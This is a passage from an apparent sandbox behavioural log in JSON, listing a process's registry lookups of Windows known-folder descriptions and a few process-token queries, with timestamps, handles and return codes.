            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000029c"
              },
              {
                "name": "ValueName",
                "value": "InfoTip"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\InfoTip"
              }
            ],
            "repeated": 0,
            "id": 520
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000029c"
              },
              {
                "name": "ValueName",
                "value": "LocalizedName"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\LocalizedName"
              }
            ],
            "repeated": 0,
            "id": 521
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000029c"
              },
              {
                "name": "ValueName",
                "value": "Icon"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Icon"
              }
            ],
            "repeated": 0,
            "id": 522
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000029c"
              },
              {
                "name": "ValueName",
                "value": "Security"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Security"
              }
            ],
            "repeated": 0,
            "id": 523
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000029c"
              },
              {
                "name": "ValueName",
                "value": "StreamResource"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\StreamResource"
              }
            ],
            "repeated": 0,
            "id": 524
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000029c"
              },
              {
                "name": "ValueName",
                "value": "StreamResourceType"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\StreamResourceType"
              }
            ],
            "repeated": 0,
            "id": 525
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000029c"
              },
              {
                "name": "ValueName",
                "value": "LocalRedirectOnly"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\LocalRedirectOnly"
              }
            ],
            "repeated": 0,
            "id": 526
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000029c"
              },
              {
                "name": "ValueName",
                "value": "Roamable"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Roamable"
              }
            ],
            "repeated": 0,
            "id": 527
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000029c"
              },
              {
                "name": "ValueName",
                "value": "PreCreate"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\PreCreate"
              }
            ],
            "repeated": 0,
            "id": 528
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000029c"
              },
              {
                "name": "ValueName",
                "value": "Stream"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Stream"
              }
            ],
            "repeated": 0,
            "id": 529
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000029c"
              },
              {
                "name": "ValueName",
                "value": "PublishExpandedPath"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\PublishExpandedPath"
              }
            ],
            "repeated": 0,
            "id": 530
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000029c"
              },
              {
                "name": "ValueName",
                "value": "DefinitionFlags"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\DefinitionFlags"
              }
            ],
            "repeated": 0,
            "id": 531
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000029c"
              },
              {
                "name": "ValueName",
                "value": "Attributes"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Attributes"
              }
            ],
            "repeated": 0,
            "id": 532
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000029c"
              },
              {
                "name": "ValueName",
                "value": "FolderTypeID"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\FolderTypeID"
              }
            ],
            "repeated": 0,
            "id": 533
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000029c"
              },
              {
                "name": "ValueName",
                "value": "InitFolderHandler"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\InitFolderHandler"
              }
            ],
            "repeated": 0,
            "id": 534
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000029c"
              },
              {
                "name": "SubKey",
                "value": "PropertyBag"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\PropertyBag"
              }
            ],
            "repeated": 0,
            "id": 535
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000029c"
              }
            ],
            "repeated": 0,
            "id": 536
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\Windows\\CurrentVersion"
              },
              {
                "name": "Handle",
                "value": "0x0000029c"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion"
              }
            ],
            "repeated": 0,
            "id": 537
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000029c"
              },
              {
                "name": "ValueName",
                "value": "ProgramFilesDir"
              },
              {
                "name": "Data",
                "value": "C:\\Program Files"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ProgramFilesDir"
              }
            ],
            "repeated": 0,
            "id": 538
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000029c"
              }
            ],
            "repeated": 0,
            "id": 539
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000290"
              }
            ],
            "repeated": 0,
            "id": 540
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtOpenProcessToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000008"
              },
              {
                "name": "TokenHandle",
                "value": "0x00000290"
              }
            ],
            "repeated": 0,
            "id": 541
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "29"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 542
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "25"
              },
              {
                "name": "TokenInformation",
                "value": "p\\xc0\\x7f\\x00\\x00\\x00\\x00\\x00`\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x10\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 543
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions"
              },
              {
                "name": "Handle",
                "value": "0x0000029c"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions"
              }
            ],
            "repeated": 0,
            "id": 544
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000029c"
              },
              {
                "name": "SubKey",
                "value": "{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}"
              },
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}"
              }
            ],
            "repeated": 0,
            "id": 545
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000029c"
              }
            ],
            "repeated": 0,
            "id": 546
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "Category"
              },
              {
                "name": "Data",
                "value": "2"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Category"
              }
            ],
            "repeated": 0,
            "id": 547
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "Name"
              },
              {
                "name": "Data",
                "value": "SystemX86"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Name"
              }
            ],
            "repeated": 0,
            "id": 548
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "ParentFolder"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\ParentFolder"
              }
            ],
            "repeated": 0,
            "id": 549
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "Description"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Description"
              }
            ],
            "repeated": 0,
            "id": 550
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "RelativePath"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\RelativePath"
              }
            ],
            "repeated": 0,
            "id": 551
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "ParsingName"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\ParsingName"
              }
            ],
            "repeated": 0,
            "id": 552
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "InfoTip"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\InfoTip"
              }
            ],
            "repeated": 0,
            "id": 553
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "LocalizedName"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\LocalizedName"
              }
            ],
            "repeated": 0,
            "id": 554
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "Icon"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Icon"
              }
            ],
            "repeated": 0,
            "id": 555
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "Security"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Security"
              }
            ],
            "repeated": 0,
            "id": 556
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "StreamResource"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\StreamResource"
              }
            ],
            "repeated": 0,
            "id": 557
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "StreamResourceType"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\StreamResourceType"
              }
            ],
            "repeated": 0,
            "id": 558
          },
          {
            "timestamp": "2025-11-20 10:58:26,156",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "LocalRedirectOnly"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\LocalRedirectOnly"
              }
            ],
            "repeated": 0,
            "id": 559
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "Roamable"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Roamable"
              }
            ],
            "repeated": 0,
            "id": 560
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "PreCreate"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\PreCreate"
              }
            ],
            "repeated": 0,
            "id": 561
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "Stream"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Stream"
              }
            ],
            "repeated": 0,
            "id": 562
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "PublishExpandedPath"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\PublishExpandedPath"
              }
            ],
            "repeated": 0,
            "id": 563
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "DefinitionFlags"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\DefinitionFlags"
              }
            ],
            "repeated": 0,
            "id": 564
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "Attributes"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Attributes"
              }
            ],
            "repeated": 0,
            "id": 565
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "FolderTypeID"
              },
              {
                "name": "FullName",
